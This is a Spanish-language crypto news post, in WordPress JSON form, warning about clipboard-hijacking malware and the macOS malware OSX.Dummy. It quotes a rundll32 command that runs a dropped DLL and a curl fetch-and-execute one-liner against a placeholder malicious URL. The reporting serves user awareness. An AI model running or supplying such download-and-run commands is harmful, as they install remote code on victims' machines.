{"id":5525,"date":"2018-07-03T00:00:00","date_gmt":"2018-07-03T00:00:00","guid":{"rendered":"

Lamentablemente los ciberataques al espacio criptogr\u00e1fico est\u00e1n ocurriendo con enorme frecuencia. Mantener una actitud preventiva siempre ser\u00e1 la mejor medida que podamos adoptar, sin embargo es importante conocer mas sobre "},"modified":"2018-07-03T00:00:00","modified_gmt":"2018-07-03T00:00:00","slug":"cryptohacking-nuevos-ataques-a-la-criptografia","status":"publish","type":"post","link":"https:\/\/crypto-economy.com\/es\/cryptohacking-nuevos-ataques-a-la-criptografia\/","title":{"rendered":"Cryptohacking: nuevos ataques a la criptograf\u00eda"},"content":{"rendered":"

Lamentablemente los ciberataques al espacio criptogr\u00e1fico est\u00e1n ocurriendo con enorme frecuencia. Mantener una actitud preventiva siempre ser\u00e1 la mejor medida que podamos adoptar, sin embargo es importante conocer mas sobre estos ataques recientes.<\/p>\n

En estos d\u00edas est\u00e1 ocurriendo una nueva forma de \u00abcryptohacking\u00bb<\/em><\/strong> que consiste en \u00a0un software basado en el Portapapeles de Windows que ha afectado a millones de usuarios de criptomonedas. Es literalmente el terror de las funciones de \u201ccopiar\u201d y \u201cpegar\u201d de nuestros sistemas operativos.<\/p>\n

Una realidad ineludible y de la cual se aprovechan los cyberdelincuentes es que las direcciones de criptomonedas son por su extensi\u00f3n, un absoluto problema para ser recordadas con facilidad. Este problema se agrava si una persona tiene m\u00faltiples direcciones en su billetera, y ello sin mencionar si posee varias billeteras de criptomonedas<\/a><\/strong> diversas. De all\u00ed que es natural que\u00a0 el usuario use las funciones \u201cCtrl C\u201d <\/strong>y \u201cCtrl V\u201d<\/strong> para copiar y pegar su direcci\u00f3n de\u00a0 en una billetera o un intercambio, o cualquier otro sitio en el que est\u00e9 realizando alguna transacci\u00f3n con criptomonedas.<\/p>\n

Este comportamiento tan recurrente y definitivamente inevitable es el que ha motivado a una serie de ciberdelincuentes para crear un malware que est\u00e1 expoliando a muchos usuarios en el mundo. Este nuevo malware se conoce como \u00abCryptoCurrency Clipboard Hijackers<\/a><\/strong>\u00ab, y b\u00e1sicamente consiste en que el malware monitorea la computadora infectada de una v\u00edctima en el software del Portapapeles y, en caso de que se detecte direcciones de criptomonedas guardadas, cambia la direcci\u00f3n de la v\u00edctima por una que los atacantes controlan.<\/p>\n

Las medidas a adoptar para prevenir que este tipo de ataques logren su cometido radican fundamentalmente en la prudencia y cuidado del usuario, ya que puede verificar dos veces y notar un error en la direcci\u00f3n y cancelar la transacci\u00f3n, y con ello evitar perder su dinero.<\/strong><\/p>\n

\"\"<\/p>\n

A modo de ilustraci\u00f3n concreta, el malware ejecuta una Biblioteca de v\u00ednculos din\u00e1micos (DLL) del sistema operativo \u00a0y descarga un archivo d3dx11_31.dll<\/strong> en la carpeta Windows Temp<\/strong> del equipo infectado. Cuando el usuario inicie sesi\u00f3n en su computadora Posteriormente, \u00a0se ejecutar\u00e1 autom\u00e1ticamente un comando \u00abrundll32 C: \\ Users \\ [username] \\ AppData \\ Local \\ Temp \\ d3dx11_31.dll, includes_func_runnded\u00bb<\/strong>. Lo dem\u00e1s ya es cuesti\u00f3n de la prudencia del usuario, pero revisar la citada carpeta de Windows no estar\u00e1 de m\u00e1s para eliminar el archivo malicioso.<\/p>\n

Otros ataques est\u00e1n ocurriendo tambi\u00e9n en sitios como Slack y Discord<\/strong>. Los hackers han atacado a los grupos de usuarios \u00a0centrados en la tem\u00e1tica de criptomonedas de estos sitios, infiltr\u00e1ndose en\u00a0 las computadoras con el citado software de \u00abcryptojacking\u00bb.<\/p>\n

Este malware en particular se conoce como OSX.Dummy<\/strong>, est\u00e1 basado en MacOS, y permite la ejecuci\u00f3n de c\u00f3digo arbitrario en las m\u00e1quinas en las que se infiltra. El modus operandi de infiltraci\u00f3n consiste en que los atacantes se hacen pasar por personas influyentes del grupo de criptomonedas de cada sitio y env\u00edan un enlace con el malware. Al producirse la instalaci\u00f3n, la aplicaci\u00f3n descarga y ejecuta el script binario \u00abcd \/ tmp && curl -s curl $ MALICIOUS_URL> script && chmod + x script && .\/script\u00bb.<\/strong><\/p>\n

En este ataque las v\u00edctimas pertenecen a un foro relacionado con criptomonedas, lo que proporciona a los atacantes acceso directo a direcciones privadas, correos electr\u00f3nicos, contrase\u00f1as y claves de seguridad del usuario, vulnerando todo.<\/p>\n

Los aspectos de prevenci\u00f3n b\u00e1sicos han de mantenerse siempre, sin embargo mantener un antivirus actualizado, una revisi\u00f3n breve de la RAM en determinados per\u00edodos de tiempo para constatar anomal\u00edas \u00a0y otras medidas de seguridad necesarias pueden hacer la diferencia y mantener seguras nuestras criptomonedas.<\/p>\n

\n","protected":false},"excerpt":{"rendered":"

Lamentablemente los ciberataques al espacio criptogr\u00e1fico est\u00e1n ocurriendo con enorme frecuencia. Mantener una actitud preventiva siempre ser\u00e1 la mejor medida que podamos adoptar, sin embargo es importante conocer mas sobre estos ataques recientes.<\/p>\n","protected":false},"author":4,"featured_media":5527,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"rank_math_title":"","rank_math_description":"","footnotes":""},"categories":[971,915,919],"tags":[],"class_list":["post-5525","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noticias","category-featured","category-tecnologia"],"_links":{"self":[{"href":"https:\/\/crypto-economy.com\/es\/wp-json\/wp\/v2\/posts\/5525","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/crypto-economy.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/crypto-economy.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/crypto-economy.com\/es\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/crypto-economy.com\/es\/wp-json\/wp\/v2\/comments?post=5525"}],"version-history":[{"count":0,"href":"https:\/\/crypto-economy.com\/es\/wp-json\/wp\/v2\/posts\/5525\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/crypto-economy.com\/es\/wp-json\/wp\/v2\/media\/5527"}],"wp:attachment":[{"href":"https:\/\/crypto-economy.com\/es\/wp-json\/wp\/v2\/media?parent=5525"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/crypto-economy.com\/es\/wp-json\/wp\/v2\/categories?post=5525"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/crypto-economy.com\/es\/wp-json\/wp\/v2\/tags?post=5525"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}